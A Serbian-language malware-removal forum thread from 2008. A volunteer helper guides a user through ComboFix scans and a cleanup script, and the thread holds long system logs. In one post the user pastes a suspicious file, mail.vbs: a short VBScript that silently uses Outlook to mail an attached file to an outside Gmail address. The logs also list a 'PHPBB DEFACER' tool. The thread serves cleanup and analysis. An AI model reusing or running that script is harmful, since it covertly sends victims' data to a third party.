R2 avg8wd;AVG8 WatchDog;C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe [2008-06-02 20:27]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]

.
Contents of the 'Scheduled Tasks' folder
"2008-06-02 19:00:31 C:\WINDOWS\Tasks\A4277F9291B0F052.job"
- c:\docume~1\n\applic~1\movesi~1\Face Bash Test.exe
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, [Link mogu videti samo ulogovani korisnici]
Rootkit scan 2008-06-02 21:47:47
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
------------------------ Other Running Processes ------------------------
.
C:\WINDOWS\system32\ati2evxx.exe
C:\WINDOWS\system32\UAService7.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\ati2evxx.exe
C:\WINDOWS\system32\WgaTray.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\Ymsgr_tray.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
.
**************************************************************************
.
Completion time: 2008-06-02 21:53:05 - machine was rebooted [n]
ComboFix-quarantined-files.txt 2008-06-02 19:52:51

Pre-Run: 28,894,609,408 bytes free
Post-Run: 29,270,118,400 bytes free

252 --- E O F --- 2008-05-16 20:47:53

Poslao: 02 Jun 2008 22:38
Idi na vrh
offline
  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Pridružio: 24 Jul 2007
  • Poruke: 12280
  • Gde živiš: Höganäs, SE

Arrow Klikni desnim tasterom miša na file: C:\mail.vbs i izaberi opciju Edit. File će se otvoriti u Notepad-u. Iskopiraj sadržaj tog file-a ovde.



-------------------------------------------------------------------------------------



Arrow Zatim... Otvoriti Notepad i iskopirati sledeci tekst:



File::
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\xhvgmvfa.dll
C:\WINDOWS\Tasks\A4277F9291B0F052.job


Folder::
C:\Documents and Settings\NetworkService\Application Data\move sixth tool
C:\Documents and Settings\n\Application Data\move sixth tool
C:\Program Files\move sixth tool
C:\Documents and Settings\All Users\Application Data\Frag great bend logo
C:\Program Files\Circle Developement

DirLook::
C:\Program Files\Ashiyane Digital Security Team

Registry::
[-HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{3669222a-e2d6-4686-8340-135655e801de}]
[-HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{bec35b16-b03b-b4e6-8917-3250adcd93bc}]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RealInter"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"bend logo clock film"=-





Snimiti na Desktop fajl iz Notepada kao "CFScript"




Prevuci snimljeni skript/tekst na ComboFix ikonicu kao na slici.
Postaviti u sledecoj poruci log koji bude bio napravljen na kraju ciscenja/skeniranja.

Poslao: 03 Jun 2008 14:09
Idi na vrh
offline
  • Pridružio: 19 Maj 2008
  • Poruke: 5
  • Gde živiš: beograd

Dim x
on error resume next 
Set fso ="Scripting.FileSystem.Object" 
Set so=CreateObject(fso) 
Set ol=CreateObject("Outlook.Application") 
Set out= WScript.CreateObject("Outlook.Application") 
Set Mail=ol.CreateItem(0) 
Mail.to="hard.rock.blogger@gmail.com" 
Mail.Subject="IP" 
Mail.Body="IP" 
Mail.Attachments.Add("c:bla.txt")
Mail.Send 
ol.Quit
Dim x
on error resume next 
Set fso ="Scripting.FileSystem.Object" 
Set so=CreateObject(fso) 
Set ol=CreateObject("Outlook.Application") 
Set out= WScript.CreateObject("Outlook.Application") 
Set Mail=ol.CreateItem(0) 
Mail.to="hard.rock.blogger@gmail.com" 
Mail.Subject="IP" 
Mail.Body="IP" 
Mail.Attachments.Add("c:bla.txt")
Mail.Send 
ol.Quit

ComboFix 08-06-01.6 - n 2008-06-03 14:02:44.3 - NTFSx86
Microsoft Windows XP Professional  5.1.2600.2.1252.1.1033.18.219 [GMT 2:00]
Running from: C:\Documents and Settings\n\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\n\Desktop\CFScript.txt
 * Created a new restore point

[color=red][b]WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !![/b][/color]

FILE ::
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\system32\xhvgmvfa.dll
C:\WINDOWS\Tasks\A4277F9291B0F052.job
.

(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\Documents and Settings\All Users\Application Data\Frag great bend logo
C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe
C:\Documents and Settings\n\Application Data\move sixth tool
C:\Documents and Settings\n\Application Data\move sixth tool\[u]0[/u]
C:\Documents and Settings\n\Application Data\move sixth tool\2mfcdtheseek.exe
C:\Documents and Settings\n\Application Data\move sixth tool\Bat flag close.exe
C:\Documents and Settings\n\Application Data\move sixth tool\boblasuq.exe
C:\Documents and Settings\n\Application Data\move sixth tool\Face Bash Test.exe
C:\Documents and Settings\NetworkService\Application Data\move sixth tool
C:\Documents and Settings\NetworkService\Application Data\move sixth tool\Bat flag close.exe
C:\Program Files\Circle Developement
C:\Program Files\Circle Developement\Uninstall.exe
C:\Program Files\move sixth tool
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\Tasks\A4277F9291B0F052.job

.
(((((((((((((((((((((((((   Files Created from 2008-05-03 to 2008-06-03  )))))))))))))))))))))))))))))))
.

2008-06-02 22:05 . 2008-06-02 22:05   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Avg8
2008-06-02 21:32 . 2008-06-03 13:44   2,280   --a------   C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:27 . 2008-06-02 21:34   <DIR>   d--------   C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-01 20:40 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41   <DIR>   d--------   C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30   <DIR>   d--------   C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12   <DIR>   d--------   C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\Program Files\Ashiyane Digital Security Team
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21   75   --a------   C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47   <DIR>   d--------   C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47   <DIR>   d--------   C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39   483,328   --a------   C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52   <DIR>   d--------   C:\Program Files\BearShare Applications
2008-05-14 03:28 . 2008-05-14 03:28   41,296   --a------   C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57   <DIR>   d--------   C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-03 13:45   <DIR>   d--------   C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23   <DIR>   d--------   C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19   691,545   --a------   C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37   2,546   --a------   C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51   <DIR>   d--hsc---   C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16   <DIR>   d--------   C:\Program Files\Spybot - Search & Destroy

.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-02 19:27   ---------   d-----w   C:\Program Files\ESET
2008-05-27 19:26   ---------   d-----w   C:\Program Files\MSN Messenger
2008-05-27 19:25   ---------   d-----w   C:\Program Files\Messenger Plus! Live
2008-05-27 18:35   ---------   d-----w   C:\Program Files\Common Files\Adobe
2008-05-26 19:48   ---------   d-----w   C:\Program Files\Macrogaming
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Free Download Manager
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Championship Manager 5
2008-05-26 19:46   ---------   d-----w   C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23   81,920   ----a-w   C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23   47,360   ----a-w   C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23   ---------   d-----w   C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38   ---------   d-----w   C:\Program Files\Yahoo!
2008-05-16 18:36   ---------   d--h--w   C:\Program Files\InstallShield Installation Information
2008-05-12 17:04   ---------   d-----w   C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50   ---------   d-----w   C:\Program Files\Windows Live
2008-04-28 20:03   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 16:59   ---------   d-----w   C:\Program Files\Lystech Computing
2008-04-21 17:34   744   ----a-w   C:\mail.vbs
2008-04-18 19:19   ---------   d-----w   C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14   ---------   d-----w   C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08   ---------   d-----w   C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37   ---------   d-----w   C:\Program Files\MauZ Php Editor
2008-04-09 15:01   ---------   d-----w   C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45   ---------   d-----w   C:\Program Files\Apple Software Update
2008-04-07 15:44   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Apple
2008-04-06 20:13   1,388,544   ----a-w   C:\WINDOWS\system32\msvbvm60.dll
2008-04-04 19:17   ---------   d-----w   C:\Program Files\Vista Start Menu
2008-04-04 18:50   64,650   ----a-w   C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50   6,106   ----a-w   C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 18:50   218,624   ----a-w   C:\WINDOWS\system32\uxtheme.dll
2008-04-04 10:18   720,896   ----a-w   C:\WINDOWS\iun6002.exe
2008-03-27 08:12   151,583   ----a-w   C:\WINDOWS\system32\msjint40.dll
2008-03-23 14:28   126,976   ----a-w   C:\WINDOWS\system32\UAService7.exe
2008-03-19 09:47   1,845,248   ----a-w   C:\WINDOWS\system32\win32k.sys
2007-11-05 12:00   524,300   ----a-w   C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28   1,164,456   ----a-w   C:\Program Files\install_flash_player.exe
.

((((((((((((((((((((((((((((((((((((((((((((   Look   )))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.

---- Directory of C:\Program Files\Ashiyane Digital Security Team ----

2000-05-22 10:00   115920   --a------   C:\Program Files\Ashiyane Digital Security Team\PHPBB DEFACER\Msinet.ocx


(((((((((((((((((((((((((((((   snapshot@2008-06-02_21.52.17.68   )))))))))))))))))))))))))))))))))))))))))
.
- 2008-06-02 19:46:45   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
+ 2008-06-03 11:43:09   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45   402872   --a------   C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]

C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=

R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
R3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]

*Newly Created Service* - CATCHME
.
Contents of the 'Scheduled Tasks' folder
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-03 14:04:46
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
Completion time: 2008-06-03 14:05:42
ComboFix-quarantined-files.txt  2008-06-03 12:05:38
ComboFix2.txt  2008-06-02 19:53:06

Pre-Run: 29,282,066,432 bytes free
Post-Run: 29,268,369,408 bytes free

201   --- E O F ---   2008-05-16 20:47:53

Poslao: 03 Jun 2008 17:17
Idi na vrh
offline
  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Pridružio: 24 Jul 2007
  • Poruke: 12280
  • Gde živiš: Höganäs, SE

Hmm...

Hajde obriši folder: C:\Program Files\Ashiyane Digital Security Team

i file: C:\mail.vbs .



Restartuj kompjuter i postavi svež ComboFix log (samo ga pokreni dvoklikom i sačekaj da završi skeniranje kako bi dobio log).

Takođe, napiši kakvo je sada stanje.

Poslao: 03 Jun 2008 17:50
Idi na vrh
offline
  • Pridružio: 19 Maj 2008
  • Poruke: 5
  • Gde živiš: beograd

ComboFix 08-06-01.6 - n 2008-06-03 17:42:24.4 - NTFSx86
Microsoft Windows XP Professional  5.1.2600.2.1252.1.1033.18.173 [GMT 2:00]
Running from: C:\Documents and Settings\n\Desktop\ComboFix.exe
 * Resident AV is active


[color=red][b]WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !![/b][/color]
.

(((((((((((((((((((((((((   Files Created from 2008-05-03 to 2008-06-03  )))))))))))))))))))))))))))))))
.

2008-06-03 15:22 . 2008-06-03 15:22   <DIR>   d--------   C:\Documents and Settings\n\Application Data\ESET
2008-06-03 15:20 . 2008-06-03 15:20   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\ESET
2008-06-02 22:05 . 2008-06-02 22:05   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Avg8
2008-06-02 21:32 . 2008-06-03 17:26   2,280   --a------   C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:27 . 2008-06-02 21:34   <DIR>   d--------   C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-01 20:40 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41   <DIR>   d--------   C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30   <DIR>   d--------   C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12   <DIR>   d--------   C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21   75   --a------   C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47   <DIR>   d--------   C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47   <DIR>   d--------   C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39   483,328   --a------   C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52   <DIR>   d--------   C:\Program Files\BearShare Applications
2008-05-14 03:28 . 2008-05-14 03:28   41,296   --a------   C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57   <DIR>   d--------   C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-03 17:27   <DIR>   d--------   C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23   <DIR>   d--------   C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19   691,545   --a------   C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37   2,546   --a------   C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51   <DIR>   d--hsc---   C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16   <DIR>   d--------   C:\Program Files\Spybot - Search & Destroy

.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-03 13:20   ---------   d-----w   C:\Program Files\ESET
2008-05-27 19:26   ---------   d-----w   C:\Program Files\MSN Messenger
2008-05-27 19:25   ---------   d-----w   C:\Program Files\Messenger Plus! Live
2008-05-27 18:35   ---------   d-----w   C:\Program Files\Common Files\Adobe
2008-05-26 19:48   ---------   d-----w   C:\Program Files\Macrogaming
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Free Download Manager
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Championship Manager 5
2008-05-26 19:46   ---------   d-----w   C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23   81,920   ----a-w   C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23   47,360   ----a-w   C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23   ---------   d-----w   C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38   ---------   d-----w   C:\Program Files\Yahoo!
2008-05-16 18:36   ---------   d--h--w   C:\Program Files\InstallShield Installation Information
2008-05-12 17:04   ---------   d-----w   C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50   ---------   d-----w   C:\Program Files\Windows Live
2008-04-28 20:03   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 16:59   ---------   d-----w   C:\Program Files\Lystech Computing
2008-04-18 19:19   ---------   d-----w   C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14   ---------   d-----w   C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08   ---------   d-----w   C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37   ---------   d-----w   C:\Program Files\MauZ Php Editor
2008-04-09 15:01   ---------   d-----w   C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45   ---------   d-----w   C:\Program Files\Apple Software Update
2008-04-07 15:44   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Apple
2008-04-06 20:13   1,388,544   ----a-w   C:\WINDOWS\system32\msvbvm60.dll
2008-04-04 19:17   ---------   d-----w   C:\Program Files\Vista Start Menu
2008-04-04 18:50   64,650   ----a-w   C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50   6,106   ----a-w   C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 18:50   218,624   ----a-w   C:\WINDOWS\system32\uxtheme.dll
2008-04-04 10:18   720,896   ----a-w   C:\WINDOWS\iun6002.exe
2008-03-27 08:12   151,583   ----a-w   C:\WINDOWS\system32\msjint40.dll
2008-03-23 14:28   126,976   ----a-w   C:\WINDOWS\system32\UAService7.exe
2008-03-19 09:47   1,845,248   ----a-w   C:\WINDOWS\system32\win32k.sys
2007-11-05 12:00   524,300   ----a-w   C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28   1,164,456   ----a-w   C:\Program Files\install_flash_player.exe
.

(((((((((((((((((((((((((((((   snapshot@2008-06-02_21.52.17.68   )))))))))))))))))))))))))))))))))))))))))
.
- 2008-06-02 19:46:45   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
+ 2008-06-03 15:25:24   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
+ 2008-06-03 13:22:30   10,134   ----a-r   C:\WINDOWS\Installer\{9DE8D465-A169-4CC7-BAF7-CDD1C9E2EE56}\callmsi.exe
+ 2008-06-03 13:22:30   140,544   ----a-r   C:\WINDOWS\Installer\{9DE8D465-A169-4CC7-BAF7-CDD1C9E2EE56}\egui.exe
+ 2008-03-13 14:43:42   40,456   ----a-w   C:\WINDOWS\system32\drivers\eamon.sys
+ 2008-03-13 14:44:36   29,704   ----a-w   C:\WINDOWS\system32\drivers\easdrv.sys
+ 2008-03-13 14:52:12   71,176   ----a-w   C:\WINDOWS\system32\drivers\epfw.sys
+ 2008-03-13 14:52:16   30,728   ----a-w   C:\WINDOWS\system32\drivers\epfwndis.sys
+ 2008-03-13 14:52:16   54,280   ----a-w   C:\WINDOWS\system32\drivers\epfwtdi.sys
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45   402872   --a------   C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll

